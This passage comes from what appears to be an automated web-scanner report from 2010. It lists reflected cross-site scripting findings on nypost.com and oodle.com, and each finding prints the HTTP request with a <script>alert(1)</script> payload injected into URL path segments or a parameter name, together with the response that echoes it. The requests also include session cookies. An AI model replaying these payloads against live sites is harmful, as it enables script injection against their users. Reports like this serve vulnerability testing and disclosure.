Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortalac67d<script>alert(1)</script>f5d5330c430/nypost/unica/hbx_original.js</p>
...[SNIP]...

1.229. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97d83<script>alert(1)</script>2f4608182c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost97d83<script>alert(1)</script>2f4608182c0/unica/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost97d83<script>alert(1)</script>2f4608182c0/unica/hbx_original.js</p>
...[SNIP]...

1.230. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5ad8c<script>alert(1)</script>f87f55a7e8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica5ad8c<script>alert(1)</script>f87f55a7e8b/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica5ad8c<script>alert(1)</script>f87f55a7e8b/hbx_original.js</p>
...[SNIP]...

1.231. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 45010<script>alert(1)</script>432d944b730 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js45010<script>alert(1)</script>432d944b730 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js45010<script>alert(1)</script>432d944b730</p>
...[SNIP]...

1.232. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7cf57<script>alert(1)</script>947f89fd93a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig7cf57<script>alert(1)</script>947f89fd93a/WebPortal/nypost/unica/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig7cf57<script>alert(1)</script>947f89fd93a/WebPortal/nypost/unica/migration.js</p>
...[SNIP]...

1.233. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27d7e<script>alert(1)</script>4ab2ac3b8e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal27d7e<script>alert(1)</script>4ab2ac3b8e8/nypost/unica/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:54 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal27d7e<script>alert(1)</script>4ab2ac3b8e8/nypost/unica/migration.js</p>
...[SNIP]...

1.234. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3063c<script>alert(1)</script>87f44a199fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost3063c<script>alert(1)</script>87f44a199fe/unica/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:54 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost3063c<script>alert(1)</script>87f44a199fe/unica/migration.js</p>
...[SNIP]...

1.235. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 62042<script>alert(1)</script>e768e25bd10 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica62042<script>alert(1)</script>e768e25bd10/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:54 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica62042<script>alert(1)</script>e768e25bd10/migration.js</p>
...[SNIP]...

1.236. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 97978<script>alert(1)</script>bd993e6441a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/migration.js97978<script>alert(1)</script>bd993e6441a HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/migration.js97978<script>alert(1)</script>bd993e6441a</p>
...[SNIP]...

1.237. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1350<script>alert(1)</script>c23b0965f93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfigc1350<script>alert(1)</script>c23b0965f93/WebPortal/nypost/unica/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfigc1350<script>alert(1)</script>c23b0965f93/WebPortal/nypost/unica/ntpagetag.js</p>
...[SNIP]...

1.238. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3587c<script>alert(1)</script>dfe201754e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal3587c<script>alert(1)</script>dfe201754e1/nypost/unica/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal3587c<script>alert(1)</script>dfe201754e1/nypost/unica/ntpagetag.js</p>
...[SNIP]...

1.239. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcef3<script>alert(1)</script>b924448cc4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypostdcef3<script>alert(1)</script>b924448cc4/unica/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypostdcef3<script>alert(1)</script>b924448cc4/unica/ntpagetag.js</p>
...[SNIP]...

1.240. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 72d2f<script>alert(1)</script>2ebfc73401 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica72d2f<script>alert(1)</script>2ebfc73401/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica72d2f<script>alert(1)</script>2ebfc73401/ntpagetag.js</p>
...[SNIP]...

1.241. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 82555<script>alert(1)</script>cd916418285 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js82555<script>alert(1)</script>cd916418285 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js82555<script>alert(1)</script>cd916418285</p>
...[SNIP]...

1.242. http://www.oodle.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc5be"><script>alert(1)</script>54f964f95d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cc5be"><script>alert(1)</script>54f964f95d1=1 HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:23:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=04039d161b6f4d305c54caf045ea7f92; path=/; domain=.oodle.com
Set-Cookie: a=dT1ENEZFQzYxNTRDRjAxNzU3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
